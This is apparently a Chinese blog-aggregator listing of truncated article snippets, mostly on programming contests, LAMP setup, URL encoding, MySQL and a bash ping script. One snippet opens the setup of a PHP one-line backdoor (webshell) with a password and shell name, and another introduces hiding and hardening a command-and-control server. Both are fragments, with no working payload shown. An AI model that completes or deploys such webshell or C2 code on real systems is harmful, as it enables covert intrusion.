"题目传送门" 还是 "视频题解" 。 感觉E还是一个挺综合的题,涉及到二分图、dp、树上的相关内容。质量还是挺不错的。其它的应该在视频里说得比较清楚。 代码如下: A. Alarm Clock B. Ternary String C1. Simple Polygon Embedding C2. N ...
分类:
其他好文 时间:
2020-05-18 14:36:57
阅读次数:
65
The statement of this problem is the same as the statement of problem C1. The only difference is that, in problem C1, nn is always even, and in C2, nn ...
分类:
其他好文 时间:
2020-05-17 20:38:11
阅读次数:
558
1、部署分离的LAMP,部署到二台服务器上,php加载xcache模块1)在c2服务器安装httpd,php,php-mysql[root@c2~]#yuminstallhttpdphpphp-mysql-y2)在mariadb服务器安装数据库mariadb-server[root@mariadb~]#yuminstallmariadb-server-y3)启动服务[root@c2~]#syste
分类:
其他好文 时间:
2020-05-16 15:16:43
阅读次数:
130
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:
Web程序 时间:
2020-05-15 13:23:16
阅读次数:
242
C2 使目标机器可以接收来自服务器的命令,但实战中通常在恶意软件分析的时候是首先被分析出来的,所以这也就是需要对C2 server加固的原因。 下面将C2 server部署时候你需要认识的一些点总结来更好建设、隐蔽、使用你的C2 server。 个人水平较差、内容浅显,文中错误内容还请师傅们指教纠正 ...
分类:
其他好文 时间:
2020-05-14 11:09:14
阅读次数:
90
实验目的 掌握动态规划算法和最短路径求法,利用最短路径知识结合实际问题建立数学模型。 实验要求 实验步骤要有模型建立,模型求解、结果分析。 实验内容 (1)某公司在六个城市C1,C2,C3,C4,C5,C6中都有分公司,从Ci到Cj的直达航班票价由下述矩阵的第i行、第j列元素给出(∞表示无直达航班) ...
分类:
其他好文 时间:
2020-05-10 11:03:20
阅读次数:
298
原创曾记否? 最后发布于2018-09-10 19:40:54 阅读数 9955 收藏展开为什么要对URL进行encode在写网络爬虫时,发现提交表单中的中文字符都变成了TextBox1=%B8%C5%C2%CA%C2%DB这种样子,观察这是中文对应的GB2312编码,实际上是进行了GB2312编码 ...
分类:
编程语言 时间:
2020-04-27 17:28:00
阅读次数:
136
在mysql中,可以执行不严格的group by 语句,可以得到看似正常的结果。 select c1,c2,c3,sum(c4) from table1 ; 此时,若再对多个结果进行 union all ,mysql会直接丢弃部分结果集,导致非常诡异的问题出现。 如 select c1,c2,c3, ...
分类:
数据库 时间:
2020-04-19 14:58:59
阅读次数:
87
#include<stdio.h> #include<math.h> using namespace std; int main(){ int c1,c2,h,m,s; int c; scanf("%d %d",&c1,&c2); c = (c2-c1); h = c / (3600*100); m ...
分类:
其他好文 时间:
2020-04-18 18:30:34
阅读次数:
55
#!/bin/bash./etc/init.d/functionsforvarin{1..254};doip=31.0.140.$varping-c2$ip>/dev/null2>&1if[$?=0];thenaction"$ip"/bin/trueelseaction"$ip"/bin/falsefidone
分类:
系统相关 时间:
2020-04-16 22:36:31
阅读次数:
85